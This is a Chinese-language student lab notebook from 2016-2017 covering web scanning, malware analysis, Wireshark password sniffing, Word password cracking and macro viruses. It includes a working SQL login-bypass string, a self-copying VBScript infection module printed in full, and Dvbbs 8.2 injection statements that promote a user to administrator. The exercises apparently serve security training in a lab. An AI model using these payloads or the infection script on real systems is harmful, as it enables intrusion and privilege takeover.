2016-2017寒假

一、awvs扫描器扫描web漏洞

wvs是一个自动化的web应用程序安全测试工具，过程只需要点下一步就可以。。。

awvs功能：

WebScanner，核心功能，Web安全漏洞扫描

Site Crawler,爬虫功能，遍历站点目录结构

Target Finder,端口扫描，长出web服务器，80,443

Subdomain Scanner，子域名扫描器，利用DNS查询

Blind SQL Infector，盲注工具

HTTP Editor，http协议数据包编译器

HTTPSniffer，HTTP协议嗅探器

HTTPFuzzer，模糊测试工具

Authentication Tester，Web认证破解工具

二、SQL原理万-能密码注入

原理：

用户进行用户名和密码验证时，网站需要查询数据库。查询数据库就是执行SQL语句。

后台执行的数据库查询操作（SQL语句）时【Select user_id,user_type,email From tsers Where user_id='用户名' And passoword='密码'】。

由于网站后台在进行数据查询的时候没有对单引号进行过滤，当输入用户名【admin】和万能密码【'2'or'1'】时，执行的SQL语句为【Select user_id,user_type,email From tsers,Where user_if='admin' And password='2'or'1'】。同事，由于SQL语句中逻辑运算符具有优先等级，【=】优先于【and】，【and】优先于【or】，且适用传递性。因此，此SQL语句在后台解析时，分成两句【Select user_id,user_type,email From tsers,Where user_if='admin' And password='2'】和【'1'】，两句bool值进行逻辑or运算，恒为TRUE。SQL语句的查询结果为TRUE，就意味着认证成功，也可以登录到系统中。

问题：

试验中在用户名中输入admin，密码中输入'2'or’1'即可登录成功。

试验中用户名输入memeda，密码中输入'2'or'1'显示用户名为admin

试验中用户名输入admin，密码中输入1234567显示“密码错误，请返回首页。。。”然后点击“返回首页”后出现“已登录用户admin”

三、恶意代码分析

恶意代码是能够在计算机系统中进行非授权操作的代码，恶意代码具有独立性和自我复制性。最常见的恶意代码有计算机并督促，特洛伊木马，计算机蠕虫，后门，逻辑炸弹等。利用分析工具分析恶意软件，了解恶意软件的具体功能。

（1）利用PEID工具个String工具查看恶意软件包含的函数，推测出程序的功能和用途。

用PEID打开恶意程序，找到其编译时间，再用PEtools工具可得编译时间，再用同样方法用PEtools得到另一软件编译时间，两软件编译时间接近与软件类型即可猜测两软件关系。

（2）利用PEID打开恶意程序文件，在ExportTable后大看的Exports Viewer中没有任何数据，可推测此文件可能为恶意程序同样方法载入恶意代码，查看倒入内容，若引用函数CopyFileA（主要用于文件的复制操作）、FindFirstFileA（主要用于文件的查找操作）、FindNextFileA（同上）。此三个函数为恶意软件常用的函数。

（3）用Strings函数输入恶意程序中包含的字符串，从中查找关键字符串，推测出软件意图。

没有进行试验。。。

恶意软件功能：复制操作，文件查找工作，下载，创建服务，创建实例程序，移动，运行程序，从网上下载软件

四、FTP链接于密码明文抓取--wireshark

（1）wireshark——在Capture中可以设置抓包的相关数据，具体参照http://blog.csdn.net/howeverpf/article/details/40743705

（2）网络结构分为4层：应用层——传输层——网络层——链路层

        EthernetⅡ的帧结构为目的MAC地址 + 源MAC + 上层协议类型 + 数据字段 + 校检。wireshark利用树形结构显示的协议。在窗口的第二大部分

       第一行为wireshark添加、该帧的相关统计信息。包括捕获时间、编号、帧长度、帧中所含有的协议等。

       第二行为链路层信息，包括目的MAC地址、源MAC地址、上层协议类型。

       第三行为网络层信息，如IP协议。细节包括版本、头部长度、总长度、标志位、源、目的IP地址、上层协议等。

       第四行为传输层信息，包括源、目的端口、序列号、期望的下个序列号、确认号、头部长度、标志位、窗口铲毒、校检和等。

       第五行为应用层信息，内容由具体的应用层协议决定。

（3）实验：用wireshark抓包获取在网页中登录的信息即可知道密码。

五、Windows下Telnet明文密码抓取—Wireshark

Telnet过程：

在命令行输入Telnet 命令，进入Telnet模式。输入open 192.168.1.3

输入N（？）肯定继续进行，进入Telnet服务

输入用户名，密码点击回车即可远程连接到被攻击的主机，驶入ipconfig，即可查看IP地址。

数据传输过程分析：

在wireshark中可以找到远程主机显示欢迎信息。

抓到登录信息数据包

抓到密码提示数据包

接下来的几个数据包，即为密码的单个字符

六、Word文件破解

在Word中点击工具——选项——安全性中设置密码

安装Advanced Office Password Recovery Pro

打开后选择暴力选项卡，选择密码长度、字符集。点击打开文件按钮，选择要被破解的Word加密文档。

第一次试验，设置密码为456789，六位密码

第二次试验，设置密码为13579，五位密码，但是第二次破解时间明显要比第一次长。

七、Word宏病毒与手动查杀

宏病毒：是使用宏语言（VBA）编写的恶意程序，存在于字处理文档、电子数据表格、数据库等数据文件中，例如

office数据处理系统中运行，利用宏语言的功能将自己复制、繁殖到其他数据文档中。

共分成两种：一种是在某个文档中包含的内嵌宏，如fileopen宏；另一种是属于Word应用程序，所有打开文档公用的宏，如autoopen宏。

Word宏病毒一般都首先隐藏在一个指定的Word万当中，一旦打开了这个Word文档，宏病毒就被执行，宏病毒要做的第一件事情就是将自己copy到全局宏的荡然区域，是的所有打开的文档都可以使用这个宏。这个文件的名字通常是  “Normal.DOT”，及通用末班。一般来说，宏病毒通过感染office文档或模板文档来传播自己。

病毒在获得第一次控制权之后，就会将自己写入到Word模板normal.dot。这样，以后每次再Word中执行打开等操作时，就会调用病毒代码，并将病毒代码写到刚打开或新建的文档中，以达到感染创博的目的。另外，宏病毒还可以通过email附件进行传播，如梅丽莎病毒。

 打开Word文档【工具】——【选项】——【安全性】——【宏安全性】

设置安全级：低         可靠发行商：勾选全部

植入宏病毒：

【工具】——【宏】——【Visual Basic编辑器】。打开编辑器主界面将宏病毒源码复制到编辑器的Project文档下。

关闭文档，再打开Word文档，弹出   “IT‘s dangerous!’”植入成功

手动查杀：

在安全性中设置“非常高”，可靠发行商全部取消勾选。打开【Visual Basic编辑器】，将宏代码删除，点击保存

在C盘中搜索【normal.dot】删除，点击文档即可正常打开。

八、脚本病毒之感染模块源码分析

脚本病毒感染模块：

********************源码********************

WScript.Echo（"我是一个脚本病毒的感染模块，确定要运行么？"）

Set fso=CreateObjcet( "Scripting.FileSystemObject" )

Set self=fso.Open TextFile(WScrept.Script.ScriptFullName,1)

VbsCopy=self.ReadAll

Set tsObj=fso.OpenTextFile("【指定路径】\【文件名】",2,true)

tsObj.Write VbsCopy

tsObj.close

Set des=fso.GetFile("【指定路径】\【文件名】")

des.copy("【指定路径】\【文件名】" & ".vbs")

des.delete(true)

WScript.Echo("已成功感染目标文件！")

********************源码*******************************

写完之后为.txt格式，将后缀改为.vbs，文件性质改变，双击，弹出对话框，点击确定，可以看到被感染文件图标改变，用笔记本打开被感染文件，则可看到病毒源码。

九、SQL注入之cookie注入

cookie注入就是利用cookie发起的注入攻击。cookies注入是基于ASP脚本中的request对象。request备用开获取客户端提交的数据。在ASP开发文档中对repuest对象的描述。

Request对象的使用方法一般是这样的：request.[集合名称]（参数名称），比如：request.form("参数名称")，但ASP中规定也可以省略集合名称，直接用这样的方式获取数据：request（“参数名称”），当使用这样的方式过去数据是，ASP规定是按QueryString、Form、Cookies、ServerVariables的顺序来获取数据的。这样，当我们使用request（“参数名称”）方式获取客户端提交的数据并且没有对使用request。cookies（“参数名称”）方式提交的数据进行过滤时，cookie注入就产生了。

（1）判断网站类型：观察网站地址结尾处，id字符之前为asp，说明此网站程序类型为asp。进行注入测试，在链接地址后添加单引号【'】提示错误信息。单击【确定后】弹出非法操作界面，说明我们的测试注入点是失败的。

（2）cookies中转：用【ASP专业调试工具.exe】模拟ASP环境。第一次运行会自动弹出一个【http://localhost】的网站，启动注入中转生成器。

生成本地asp文件：

A.点选【cookie注入】表框

B.在【注入URL地址】和【来源页】中输入URL地址（不带参数）

C.在【注入键名】中，输入ID=

D.在【POST提交值】中，将00改为原来的请求值（即“id=”后面的值）

E.点击【生成ASP】，即可在本地生成asp文件。

重启asp调试服务，然后在IE中访问生成的jmcook，asp文件，页面能后正常访问

（3）进行注入攻击：启动Domain.exe的明小子，找到【SQL注入】选项卡下的【SQL注入猜解检测】。将连接 考到【注入点】中进行SQL注入检测。点击【开始检测】，即可弹出提示信息，由此可进行SQL注入。依次点击【猜解表名】，选中列名，点击【猜解内容】，获得相应的敏感信息，及管理用户名和密码。

十、动网论坛8.2经典注入漏洞利用

（1）正常注册登录：访问动网论坛注册一个新用户：san，密码：123456

（2）漏洞测试与利用：退出san用户，打开登录界面，用【san' and 'a' =' a】密码：【1234567】登录。

使用【san' and 'a' =' b】,密码【1234567】登录。提示用户不存在，说明以上语句起作用了（？？）。

在用户名中输入语句【';update dv_user set usergroupid=1 where username='san'--】密码随意（？？没说）登录。提示用户名不存在，再次使用正确用户名密码登录。在“控制面板-我能做什么”中可以看到san用户已属于管理员组用户。

退出，我们再次使用【san';insert into dv_admin(username,password,flag,adduser)values('san','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','san')- -】登录，密码为正确密码（注意：49ba59abbe56e057是123456的cmd16位密文）

打开管理员界面http://192.168.1.3:8010/adin，使用san以及密码123456登录，发现可以成功登录

可以看到我们成功登录到后台，已经是管理员身份。